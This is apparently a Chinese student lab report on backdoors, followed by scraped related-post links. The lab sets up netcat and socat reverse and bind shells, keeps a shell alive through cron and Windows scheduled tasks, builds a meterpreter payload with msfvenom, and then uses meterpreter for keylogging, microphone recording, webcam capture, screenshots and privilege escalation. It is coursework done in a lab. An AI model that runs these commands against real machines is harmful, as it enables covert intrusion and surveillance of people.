基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载破解游戏,盗版电影或安装来历不明的软件,可能被留下后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win环境下可以开机自动启动,linux环境可以用corn启动。
(3)Meterpreter有哪些给你映像深刻的功能?
可以自己定制后门程序,针对不同用户不同主机不同人群。
(4)如何发现自己有系统有没有被安装后门?
杀毒软件报错,开启防火墙等防护措施。

任务一

使用ipconfig查询win7的IP地址

进入ncat文件夹中,使用命令ncat.exe -l -p 5337监听本机的5337端口
在kali环境中使用netcat命令连接到Windows主机,使用netcat 命令netcat 192.168.1.101 5337 -e /bin/sh进行连接

即可获取kali权限

任务二

使用ifconfig查看kali的IP地址

使用nc -l -p 5337指令监听5337端口

在Windows下,使用ncat.exe -e cmd.exe 192.168.1.154 5337反向连接kali的5337端口
在kali下可以看到已经获得Windows权限Microsoft Windows,可以输入命令进行操作

任务三

首先在Windows下监听5337端口ncat.exe -l 5337

从kali使用netcat 192.168.1.101 5337命令连接到Windows端口

建立连接后可以进行数据传输

任务四

在Windows系统下,使用ncat.exe -l -p 5337监听5337端口

在kali中,使用crontab -e指令编辑一条定时任务,输入指令后选3进入crontab编辑界面

在最后一行添加07 * * * * /bin/netcat 192.168.1.101 5337 -e /bin/sh,在每个小时的第07分反向连接Windows主机的5337端口,然后保存退出

因为做的时候是20:05 于是我设定07启动

任务五

在win7右键我的电脑,点击管理,在任务计划程序中点击创建任务,填写任务名字并编辑触发器。

点击操作选择启动程序程序或脚本填写你自己的socat.exe程序的路径,在添加参数中填写tcp-listen:5337 exec:cmd.exe,pty,stderr

创建完成之后锁定计算机再重新启动发现程序已经在运行了

在kali虚拟机中输入socat - tcp:192.168.1.101:5337可以发现已经成功获得了一个cmd shell

任务六

在kali上执行命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe这里的IP地址填写kali的IP地址,生成后门程序20165337_backdoor.exe

在Windows下进入ncat文件夹输入命令ncat.exe -lv 5337 > 20165337_backdoor.exe,被控主机就进入了文件接收模式

在kali中输入nc 192.168.1.101 5337 < 20165337_backdoor.exe,这里的IP为win7的IP,进行后门文件的传输

传输完成

在Kali上使用命令msfconsole进入msf控制台

输入:
use exploit/multi/handler使用监听模块,
set payload windows/meterpreter/reverse_tcp设置payload
set LHOST 192.168.1.154设置反弹回连的IP和端口,这里用的是kali的IP
set LPORT 5337设置反弹回连的IP和端口

输入show options

exploit使用监听

运行Win7的后门程序

kali已经获取权限

任务七

在任务六的基础上进行
使用record_mic指令截获一段音频,用-d选项设置录制时间

使用webcam_snap指令可以使用摄像头进行拍照
但是win7不能调用摄像头,会出现以下界面

使用keyscan_start开始记录下敲键的过程,使用keyscan_dump指令读取敲键的记录

使用screenshot命令进行截屏

使用命令getuid查看当前用户,使用getsystem命令提权

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. java网络编程基本知识

    1.基本概念 网络:一组相互连接的计算机,多台计算机组成,使用物理线路进行连接 网络连接的功能:交换数据.共享资源 网络编程3要素: IP 地址:唯一标识网络上的每一台计算机,两台计算机之间通信的必备 ...

  2. iOS截屏并修改截图然后分享的功能实现

    一. 实现的效果类似微博的截图分享 不仅截图分享的时候还进行图片的修改,增加自己的二维码 二.实现方式 苹果在ios7之后提供了一个新的通知类型:UIApplicationUserDidTakeScr ...

  3. 关于map的初级应用

    map实际采用了红黑树的实现,在此,我们先不讨论map的底层实现结构原理,先来看看map究竟是怎么用,以及我是怎么看待map的. 先上代码: #include <map> #include ...

  4. java集合-HashMap源码解析

    HashMap 键值对集合 实现原理: HashMap 是基于数组 + 链表实现的. 通过hash值计算 数组索引,将键值对存到该数组中. 如果多个元素hash值相同,通过链表关联,再头部插入新添加的 ...

  5. 清除 x-code 缓存

    https://www.jianshu.com/p/5673d8333544 之前由于经费不足,购置的128的mac,现在发现一不注意盘就满了,悔之晚矣...a).清除 x-code CoreSimu ...

  6. 小程序 canvas画本 地图片

    ctx.drawImage('../../../../page/home/resources/pic/che_logo.png', 10, 435, 50,50); 本地图片要根路径

  7. 【tool】VLC播放rtmp协议

    您的输入无法被打开: VLC 无法打开 MRL「rtmp://112.35.3.71:47201/api/6276-0.1546939632724.flv」.详情请检查日志.

  8. 基于Redis实现分布式锁

    分布式锁具有的特性: 1.排他性: 文件系统: 数据库:主键 唯一约束 for update 性能较差,容易出现单点故障 锁没有失效时间,容易死锁 缓存Redis:setnx 实现复杂: 存在死锁(或 ...

  9. [SDOI2017]苹果树

    题目描述 https://www.luogu.org/problemnew/show/P3780 题解 一道思路巧妙的背包题. 对于那个奇怪的限制,我们对此稍加分析就可以发现它最后选择的区域是一个包含 ...

  10. (六)QDialog,QMessageBox,QFileDialog,QColorDialog颜色,QFontDialog字体

    QDialog 对话框: 1.模态对话框: QDialog dlg(this); // 显示模态对话框 exec ,后面的不可操作 dlg.exec(); // 阻塞 2.非模态对话框: QDialo ...